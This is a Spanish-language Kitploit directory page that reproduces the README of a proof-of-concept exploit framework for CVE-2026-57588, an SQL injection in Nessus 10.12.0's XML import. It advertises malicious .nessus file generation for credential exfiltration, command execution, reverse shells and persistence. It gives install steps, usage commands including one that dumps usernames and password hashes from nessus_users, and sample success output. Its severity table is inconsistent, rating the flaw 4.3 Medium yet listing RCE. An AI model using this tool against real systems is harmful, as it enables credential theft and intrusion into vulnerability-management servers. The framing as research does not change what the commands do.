Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — PoC para CVE-2026-57588 - Inyección SQL en la importación XML de Nessus 10.12.0. Genera archivos .nessus maliciosos para enumerar bases de datos, exfiltrar credenciales y probar inyección ciega basada en tiempo. Para investigación de seguridad autorizada. Autor: Sudeepa Wanigarathna. Parcheado en 10.12.1. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosPost-ExplotaciónPruebas de PenetraciónComando y Control
Red Teaming
Seguridad de Bases de Datos
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

Ver Repositorio
117hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

PoC para CVE-2026-57588 - Inyección SQL en la importación XML de Nessus 10.12.0. Genera archivos .nessus maliciosos para enumerar bases de datos, exfiltrar credenciales y probar inyección ciega basada en tiempo. Para investigación de seguridad autorizada. Autor: Sudeepa Wanigarathna. Parcheado en 10.12.1.

Compartir

🛡️ CVE-2026-57588 - Framework de Explotación de Inyección SQL en Nessus

Security Research CVE Version Python License


📋 Tabla de Contenidos

  • Descripción General
  • Detalles de la Vulnerabilidad
  • Características
  • Instalación
  • Inicio Rápido
  • Ejemplos de Uso
  • Tipos de Payload
  • Escenarios Avanzados
  • Informes
  • Solución de Problemas
  • Consideraciones de Seguridad
  • Licencia

🔍 Descripción General

CVE-2026-57588 es una vulnerabilidad crítica de inyección SQL descubierta en Tenable Nessus versiones 10.12.0 y anteriores. La vulnerabilidad reside en el mecanismo de análisis XML al importar archivos de resultados de escaneo .nessus, lo que permite a usuarios autenticados con privilegios de importación ejecutar consultas SQL arbitrarias contra la base de datos PostgreSQL del backend.


⚠️ Detalles de la Vulnerabilidad

PropiedadValor
ID de CVECVE-2026-57588
Tipo de VulnerabilidadInyección SQL
Productos AfectadosTenable Nessus 10.12.0 y anteriores
Versión CorregidaNessus 10.12.1 y posteriores
Puntuación CVSS4.3 (Media)
Vector de AtaqueRed
Complejidad de AtaqueBaja
Privilegios RequeridosAutenticado (Permisos de importación)
Interacción del UsuarioRequerida (Ingeniería social)
ImpactoExfiltración de datos, RCE

🔬 Detalles Técnicos

La vulnerabilidad existe debido a una sanitización insuficiente de los valores de las etiquetas XML antes de que se incorporen a las consultas SQL durante el proceso de importación. Un actor malicioso puede crear un archivo .nessus que contenga payloads de inyección SQL especialmente diseñados en etiquetas XML como:

  • hostname
  • fqdn
  • os
  • system-type
  • mac-address
  • netbios-name

Cuando un usuario privilegiado importa el archivo malicioso, los valores no sanitizados se ejecutan contra el backend de PostgreSQL, lo que permite:

  • Enumeración de la base de datos
  • Exfiltración de datos
  • Ejecución de comandos
  • Acceso al sistema de archivos
  • Instalación de persistencia

✨ Características

Haz clic para expandir la lista de características

🎯 Gestión de Payloads

  • Más de 13 tipos de payload categorizados por propósito
  • Generación de payloads basada en plantillas
  • Creación y validación de payloads personalizados
  • Validación de parámetros y comprobación de sintaxis
  • Verificación de sintaxis SQL

🚀 Capacidades de Explotación

  • Explotación multi-etapa con ejecución en paralelo
  • Fingerprinting y enumeración de bases de datos
  • Exfiltración de datos con selección personalizada de tablas/columnas
  • Ejecución de comandos en el sistema objetivo
  • Acceso y lectura del sistema de archivos
  • Reverse shell con sesión interactiva
  • Mecanismos de instalación de persistencia
  • Inyección SQL ciega basada en tiempo
  • Inyección SQL ciega basada en booleanos
  • Inyección SQL basada en errores
  • Consultas apiladas (stacked queries) para explotación avanzada
  • Exfiltración DNS fuera de banda (out-of-band)

📊 Informes y Registros

  • Informes HTML con estilo profesional
  • Informes Markdown para documentación
  • Informes JSON para automatización
  • Informes de texto para revisión rápida
  • Rotación de logs con múltiples niveles
  • Estadísticas detalladas de ejecución
  • Hash de archivos para verificación de integridad

🛠️ Funciones Avanzadas

  • Ejecución en paralelo con trabajos configurables
  • Soporte de proxy para operaciones sigilosas
  • Gestión de certificados SSL/TLS
  • Validación XML y comprobación de esquemas
  • Modo interactivo para explotación en vivo
  • Mecanismo de reintentos para mayor fiabilidad
  • Configuración de timeout para conexiones lentas

📦 Herramientas Profesionales

  • Estructura CLI basada en subcomandos
  • Modos verboso y silencioso
  • Salida de terminal en color
  • Indicadores de progreso para tareas largas
  • Soporte de Docker para pruebas contenerizadas
  • Compatibilidad multiplataforma (Linux, Windows, macOS)

📦 Instalación

🐍 Requisitos Previos

  • Python 3.7 o superior
  • pip (gestor de paquetes de Python)
  • Git (opcional, para clonar)

🔧 Instalación Rápida

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Create and activate virtual environment
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

🐳 Instalación con Docker

# Build the Docker image
docker build -t nessus-exploit .

# Run the tool
docker run -it --rm nessus-exploit generate -u https://test.com -p enum

📦 Instalación como Paquete

# Install as a package
pip install -e .

# Now you can run from anywhere
nessus-exploit generate -u https://test.com -p enum

🚀 Inicio Rápido

Uso Básico

# Generate a basic enumeration exploit
python3 exploit.py generate -u https://test.com -p enum

# Generate advanced multi-stage exploit
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus

# Extract data from database
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

Ayuda de Comandos

# Show general help
python3 exploit.py --help

# Show generate command help
python3 exploit.py generate --help

# List all available payloads
python3 exploit.py list

💡 Ejemplos de Uso

1. Enumeración Básica

python3 exploit.py generate -u https://test.com -p enum
Salida Esperada
[2026-07-22 10:15:23] [INFO] [*] Starting exploitation against https://test.com
[2026-07-22 10:15:23] [INFO] [*] Session: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Payload: enum
[2026-07-22 10:15:23] [INFO] [*] Executing stage: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Generated XML: exploit_20260722_fingerprint_101523.nessus (3847 bytes)
[2026-07-22 10:15:24] [INFO] [*] Executing stage: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Generated XML: exploit_20260722_schema_dump_101524.nessus (4213 bytes)
[2026-07-22 10:15:25] [INFO] [+] Exploitation complete! Duration: 2.15s

============================================================
EXPLOITATION SUMMARY
============================================================
Target: https://test.com
Status: SUCCESS
Duration: 2.15s
Files Generated: 3
Reports Generated: 3
============================================================

2. Explotación Avanzada Multi-Etapa

python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v

3. Exfiltración de Datos

# Extract user credentials
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
Descargar herramienta